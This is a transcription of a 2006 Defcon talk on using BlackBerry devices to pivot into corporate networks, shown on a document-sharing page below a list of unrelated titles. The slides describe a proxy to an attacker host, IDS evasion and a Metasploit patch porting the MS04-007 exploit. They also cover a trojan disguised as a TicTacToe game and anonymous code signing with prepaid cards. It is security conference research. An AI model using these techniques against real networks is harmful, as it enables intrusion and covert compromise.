Blackjacking 0wning the Enterprise via Blackberry. Jesse x30n D Aguanno

Similar documents
Teleworking and access to ECHA IT systems

Deployment Guide. GlobalMeet 5 June 27, 2018

Using Trustwave SEG Cloud with Exchange Server

Technical Considerations of Telecommuting

eprint MOBILE DRIVER User Guide

FEATURES AND FUNCTIONALITY GUIDE

VMware AirWatch Secure Gateway Guide Securing Your Infrastructure

VMware AirWatch Secure Gateway Guide Securing Your Infrastructure

LotusLive. Working together just got easier Online collaboration solutions for the working world

Guide to Enterprise Telework and Remote Access Security (Draft)

Office of the Chief Privacy Officer. Privacy & Security in an App Enabled World HIMSS, Tuesday March 1, 2016, Las Vegas, NV

Social Engineering & How to Counteract Advanced Attacks. Joe Ferrara, President and CEO Wombat Security Technologies, Inc.

Frequently Asked Questions & Helpful Tips

National Verifier Training: Eligibility. November 8, 2017

ARKANSAS HEALTHCARE TRANSPARENCY INITIATIVE: DATA SUBMISSION GUIDE & ONBOARDING FREQUENTLY ASKED QUESTIONS

PRIVACY IMPACT ASSESSMENT (PIA) For the

DEFCON Authenticator. with Dual USB Port Hub

GLOBALMEET FOR BLACKBERRY GLOBALMEET FOR BLACKBERRY USER GUIDE

The State of US Voting System Security DEFCON Voting Machine Hacking Village July 2017

Address Verification - Graduate Modification

IRBNet Instructions for Investigators

Connect Your Universe The complete solution for emergencies, events and every day

GLOBALMEET GLOBALMEET USER GUIDE

Running a Bug Bounty Program

Copyright 2013 GE Multilin Inc. All rights reserved. Power Management Control System (PMCS) software revision EnerVista, Integrator, Digital

DEP Documentation RSA Key Import In Keytable User Manual

Application Notes for IgeaCare ApoloDS with Avaya IP Office Issue 1.0

Allworx Reach and Reach Link

Precedence Privacy Policy

VMware AirWatch Guide for the Apple Device Enrollment Program (DEP) Using Apple's DEP to automatically enroll new devices with AirWatch MDM

Subj: BUREAU OF NAVAL PERSONNEL POLICY FOR USING NAVY MOBILE DEVICES (SMART PHONE/TABLETS)

Site Install Guide. Hardware Installation and Configuration

Hilton Reservations and Customer Care

Deployment Guide. GlobalMeet Published: January 2018

MedCheck Frequently Asked Questions (FAQ) (Physician, AHP) GETTING STARTED

Installing and Configuring Siebel CRM Server Software on Linux

Siemens Business Services E-Government Strategy. How to build it for a whole country the Austrian E-Government Experience

ENABLING DIGITAL TRANSFORMATION WITH SECURE ENGAGMENT AND COLLABORATION

Connect Your Universe

Manage Pell Payments_SPD_ Revision Document Generation Date Date Modified Last Changed by sbrock Status sent for review 11.

NIH era Commons Presentation ( ecommons for short)

So You Want to Be a Programmer?

WISHIN Statement on Privacy, Security, and HIPAA Compliance - for WISHIN Pulse

GLOBALMEET USER GUIDE

Fundraising. Online. for your website

Server, Desktop, Mobile Platforms Working Group (SDMPWG) Dated

Hospital-wide Lean Project:

Fundraising. Online. for your website

Looking Ahead The Future of Health Information and Informatics

Netrust SSL Web Server Certificate Renewal Application Enrolment Guide

Establishing a Personal Electronic Health Record in the Rhine-Neckar Region

Royal District Nursing Service (RDNS) is the largest and

Joint Base Lewis-McChord (JBLM), WA Network Enterprise Center (NEC) COMPUTER-USER AGREEMENT Change 1 (30 Jun 2008)

SECURITY CULTURE HACKING: DISRUPTING THE SECURITY STATUS QUO

CWE TM COMPATIBILITY ENFORCEMENT

Corporate Citizenship Community Site FAQs

Clinical Mobility CSOHIMSS 2011 Slide 0 October 21, 2011 Health Care Quality, Security and HIE Synergy 2011

!"#$%&'"()!&*+,'#-).!/)*0() 1."+2. Kevin Glinski Lead Developer Evangelist

Optima POC PARTICIPANT GUIDE

COMPETITIVE HACKING: NULLIFY S ORIGINS

White Paper: Mobilizing Patient Care. Mobile Solutions Are a Game Changer for Hospital-Based Nurses

May 10, Empathic Inquiry Webinar

1. Lead Times. 2. Duration and Effective Date

Siebel Installation Guide for Microsoft Windows. Siebel Innovation Pack 2017 July 2017

CareTracker Patient Portal Tips

Full IP. nursecall and notification

Emergency Medical Services Division Policies Procedures Protocols

Streamlining Medical Image Sharing For Continuity of Care

PMIX ADVANCING PMP DATA SHARING THROUGH STANDARDIZATION AND INNOVATION CARL FLANSBAUM, DIRECTOR, NEW MEXICO PMP CO-CHAIR PMIX WORKING GROUP

VMware AirWatch Guide for the Apple Device Enrollment Program (DEP) Using Apple's DEP to automatically enroll new devices with AirWatch MDM

Military medics save lives in the field, and now get some

Software Requirements Specification

Siebel Installation Guide for Microsoft Windows. Siebel Innovation Pack 2015, Rev. D November 2015

RAS What s New for Grants?

Referred Patient Alerts & Online Recruitment Manager for Sites Instructions

March 14, pm ET

Implementation of Electronic Bidding by LADOTD

How to Start Your Monthly Giving Program and Turn Your Donors into Monthly Givers - A Step-By-Step Guide

Join Us At The Table! NDNQI Site & Survey Coordinator Roles

How to Implement a Successful Telecommuting Program

Campaign and Candidate Questionnaire Canada s 41 st General Election May 2, 2011

The Cost of a Misfiled Medical Document

IRES Proposal Tracking (PT) Presented by: Kathi Goodfriend Office of Sponsored Projects Revised 03/15/2018 PRN: 5/14/ :19 PM

New gtld Program Update!!

Essential Characteristics of an Electronic Prescription Writer*

Remote Telemonitoring for Chronic Respiratory Illness Gains Ground in Portugal

Technological Approaches for Positive Product Recipient Identification

MyRx: Final Report PREAMBLE Abstract 1.2 Previous Work Keywords INTRODUCTION 1.1 Overview

TELEMEDICINE CART/ROBOT PATIENT PORTAL & APP WEARABLE/ MONITORING DEVICE

Best practices in healthcare

Exploits in Wetware: How the Defcon 2017 SE CTF experience can help organizations defend against social engineering.

How to Apply for the Free Application for Federal Student Aid (FAFSA)

At a very high level, the Additional Funds financial aid certification process consisted of the following manual business steps:

GLOBALMEET FOR OUTLOOK RELEASE 12.3

Sanilac County Community Mental Health Authority

GLOBALMEET FOR ANDROID GLOBALMEET FOR ANDROID USER GUIDE

The Future of Healthcare Depends on a New Architecture for Patient Identity Interoperability

Grants emanagement System (GeMS)

State Policy in Practice

CNA e Tool: Briefing for Assessors and Lenders HUD-FHA Multifamily Webinar Presentation May 11 & May 24, 2017

Transcription:

Blackjacking 0wning the Enterprise via Blackberry Jesse x30n D Aguanno x30n@digrev.org jesse@praetoriang.net Defcon 14 - Las Vegas, NV USA 2006

Blackjacking 0wning the Enterprise via Blackberry Hello, My name is $ whois x30n Founder / Director Prof Services Praetorian Global, LLC http://www.praetoriang.net Member / Team Captain Digital Revelation Security Research Group & 2 time winners, Defcon CTF http://www.digrev.org Defcon 14 - Las Vegas, NV USA 2006 2

Blackjacking 0wning the Enterprise via Blackberry Who uses Blackberry? Who doesn t? Market share lead for handhelds. Gartner Government workers and emergency personnel would be exempt from a possible shutdown Computerworld Defcon 14 - Las Vegas, NV USA 2006 3

Blackjacking 0wning the Enterprise via Blackberry The solution Background Typical Corporate Blackberry Installation Defcon 14 - Las Vegas, NV USA 2006 4

Blackjacking 0wning the Enterprise via Blackberry The solution Background Outgoing BES to RIM connection Defcon 14 - Las Vegas, NV USA 2006 5

Blackjacking 0wning the Enterprise via Blackberry The solution Background Persistent Tunnel BES and RIM Defcon 14 - Las Vegas, NV USA 2006 6

Blackjacking 0wning the Enterprise via Blackberry The solution Background Persistent Tunnel BES and BB Device Defcon 14 - Las Vegas, NV USA 2006 7

The solution Background BB device now virtually on internal network Defcon 14 - Las Vegas, NV USA 2006 8

The solution -Review BES / MDS creates outbound, persistent connection to RIM network Blackberry device then virtually placed on internal network (Wherever BES / MDS exists) always-on always connected Wireless carrier independent Defcon 14 - Las Vegas, NV USA 2006 9

Problem with solution Attitude of handhelds Only security of data on handheld usually considered Not impact of handheld on rest of network Blackberries are computers with constant connection to corporate LAN Not treated like other remote access. i.e. VPN / Dial-in Defcon 14 - Las Vegas, NV USA 2006 10

Problem with solution Guess what, we can exploit this problem! Enter BBProxy Defcon 14 - Las Vegas, NV USA 2006 11

Step 1 External Connection Create an outbound socket connection from Blackberry device to attacker controlled host on the internet. Defcon 14 - Las Vegas, NV USA 2006 12

Step 1 External Connection Defcon 14 - Las Vegas, NV USA 2006 13

Step 2 Secondary Connection From attacker controlled host, we then initiate a subsequent socket connection to a second host including internal hosts. Defcon 14 - Las Vegas, NV USA 2006 14

Step 2 Secondary Connection Defcon 14 - Las Vegas, NV USA 2006 15

Step 3 Proxy connection between external and internal host Blackberry then proxies all data between hosts. Defcon 14 - Las Vegas, NV USA 2006 16

Step 3 Proxy connection between external and internal host App Serv Blackberry Internal LAN Proxy Connection External Host to Internal Host Internet Attacker Host Defcon 14 - Las Vegas, NV USA 2006 17

BBProxy Sweet! So now we can directly communicate with any port on an internal host from an external host Right through our little blackberry handheld. Defcon 14 - Las Vegas, NV USA 2006 18

Demo - Let s check it out Interaction with internal service Defcon 14 - Las Vegas, NV USA 2006 19

Demo - Defcon 14 - Las Vegas, NV USA 2006 20

BBProxy OK, cool, we can now telnet to an internal box or ssh or even grab intranet sites. But can we do anything cooler? This is Defcon Aren t we going to attack something? OF COURSE! Defcon 14 - Las Vegas, NV USA 2006 21

Metasploit! Enter Metasploit Point Click Root Now with Blackberry flavor! TM C est impossible! Defcon 14 - Las Vegas, NV USA 2006 22

Metasploit! Top level ( listener ) function added to metasploit to create a listening socket on port 1455 (default) When a connection is received, verifies BBProxy handshake Once connected, the connection is available to any exploit within the framework Just need to call it. Defcon 14 - Las Vegas, NV USA 2006 23

Demo - Let s do it Exploitation of Vulnerable service behind corporate firewall Defcon 14 - Las Vegas, NV USA 2006 24

Demo - Defcon 14 - Las Vegas, NV USA 2006 25

Metasploit! Porting an exploit Very easy to plug-in to usable exploits Let s walk through one msasn1_ms04_007_killbill.pm Defcon 14 - Las Vegas, NV USA 2006 26

Metasploit! Porting an exploit Patch msasn1_ms_04_007_killbill exploit @@ -93,7 +93,8 @@ my $target_idx = $self->getvar('target'); my $target_app = $self->getvar('proto'); my $shellcode = $self->getvar('encodedpayload')->payload; - my $target = $self->targets->[$target_idx]; + my $target = $self->targets->[$target_idx]; + my $s = $self->getvar('proxyconn'); Here we set $s to the value of the global variable PROXYCONN (Our proxy connection) Defcon 14 - Las Vegas, NV USA 2006 27

Metasploit! Porting an exploit Patch msasn1_ms_04_007_killbill exploit $self->printline("[*] Attempting to exploit target ". $target->[0]); @@ -124,17 +125,34 @@ "\x08\x00\xeb\xfe"; my $token = SPNEGO::token($stage0, $shellcode); - my $sock = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->getvar('ssl'), - ); - - if ($sock->iserror) { - $self->printline("[*] Could not connect: ".$sock->geterror()); - return; - } We remove the standard socket build stuff Defcon 14 - Las Vegas, NV USA 2006 28

Metasploit! Porting an exploit + if (!$s) { + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->getvar('ssl'), + ); + + if ($s->iserror) { + $self->printline('[*] Error creating socket: '. $s- >GetError); + return; + } + } else { + $s = $s; + } And only do it if PROXYCONN wasn t set Defcon 14 - Las Vegas, NV USA 2006 29

Metasploit! Porting an exploit + + my $sock = $s; + $sock- >Send($target_host.":".$target_port."\n"); Otherwise use our previous proxy connection and send the appropriate string to start the subsequent connection Defcon 14 - Las Vegas, NV USA 2006 30

Metasploit! Porting an exploit + sleep(2); + print $sock->recv(); + sleep(2); + Sleep a bit to allow the second connection to be established, then do it! if ($target_app eq 'http') { return $self->exploitiis($sock, $token); @@ -176,7 +194,7 @@ if ($resp =~ /0x80090304/) { $self->printline("[*] Server responded with error code 0x80090304"); } - + sleep(10); $self->handler($sock); $sock->close; return; Defcon 14 - Las Vegas, NV USA 2006 31

Metasploit Current Limitations Use with current BBProxy limited to tcp based exploits won t require much to allow udp Reliable exploitation with vanilla tcp connections Problems encountered with some RPC and special protocol exploits. Plan to rework to remove these limitations Defcon 14 - Las Vegas, NV USA 2006 32

IDS evasion goodness Each newer device has onboard tcp/ip stack No need for MDS to make connection Simple to choose connection type in code deviceside= true or deviceside= false in connection string First connection from device side (Direct from carrier network). Second connection through MDS Nothing on the border can see our traffic (It s all encrypted by RIM s tunnel ) Defcon 14 - Las Vegas, NV USA 2006 33

IDS evasion goodness Internet First Connection Attacker controlled box Carrier Network Wireless Providers Blackberry Defcon 14 - Las Vegas, NV USA 2006 34

IDS evasion goodness Defcon 14 - Las Vegas, NV USA 2006 35

IDS evasion goodness Defcon 14 - Las Vegas, NV USA 2006 36

IDS evasion goodness Just like Defcon 14 - Las Vegas, NV USA 2006 37

Else Problem BBProxy requires control of device (Interactive app) Solution First and only blackberry trojan (That I know of)! Defcon 14 - Las Vegas, NV USA 2006 38

Trojan Hot Game 2006 Same functionality as BBProxy User only sees game interface (TicTacToe) Over the air download! Easily integrated with other network discovery functions and more covert methods of control (IRC, etc.) Defcon 14 - Las Vegas, NV USA 2006 39

Demo - Let s do it Exploitation of Vulnerable service behind corporate firewall while user plays TicTacToe Defcon 14 - Las Vegas, NV USA 2006 40

Code Signatures RIM requires code (.cod) to be signed with RIM assigned private key to use proprietary APIs, network access without confirmation, etc. $100 USD processing fee to verify identity of signature requestor Credit card name and address used for verification of ID Defcon 14 - Las Vegas, NV USA 2006 41

Code Signatures Prepaid Credit Cards! Prepaid CCs allow online transactions by ignoring the name and address fields No need to steal credit card number Widely available in mini markets and grocery stores everywhere Works! Defcon 14 - Las Vegas, NV USA 2006 42

Review We can talk to hosts behind the corporate firewall We can attack them We can subvert IDS or data logging We can do it in a trojan We can sign our trojan anonymously and use all APIs It gets worse! (or maybe better ) Defcon 14 - Las Vegas, NV USA 2006 43

Device Provisioning Ease of use vs. Security always a fight Ease of use wins! Extremely easy to add a new device just plug it in New device is then provisioned for use on the BES Defcon 14 - Las Vegas, NV USA 2006 44

Blackjacking Hijacking blackberry connection BB devices are identified by their unique PIN Blackberry user plugs in new device to PC New PIN is recognized Encryption keys are generated and stored on BB handheld Defcon 14 - Las Vegas, NV USA 2006 45

Blackjacking Hijacking blackberry connection Device PIN and new key pushed to Exchange via MAPI Info stored in BlackberryHandheldInfo folder in users mailbox New device is now routing through MDS This can be automated! Defcon 14 - Las Vegas, NV USA 2006 46

Blackjacking Hijacking blackberry connection Work in progress Trojan to automate BB hijack process Utilizing other delivery mechanisms Everything else Check www.praetoriang.net or www.digrev.org for updates. Defcon 14 - Las Vegas, NV USA 2006 47

References Code and Updated Slides can be found at http://www.praetoriang.net/presentations/blackjack or http://www.digrev.org/blackjack Final slides will have reference to RIM security documentation Defcon 14 - Las Vegas, NV USA 2006 48

Q&A? Defcon 14 - Las Vegas, NV USA 2006 49

Thanks / Greetings Digital Revelation (DigRev) Pablo_marx FX Ian Robertson (RIM) Defcon 14 - Las Vegas, NV USA 2006 50

Thank You For Coming! Jesse x30n D Aguanno jesse@praetoriang.net x30n@digrev.org Defcon 14 - Las Vegas, NV USA 2006 51

2024 © careersdocbox.com Privacy Policy | Terms of Service | Feedback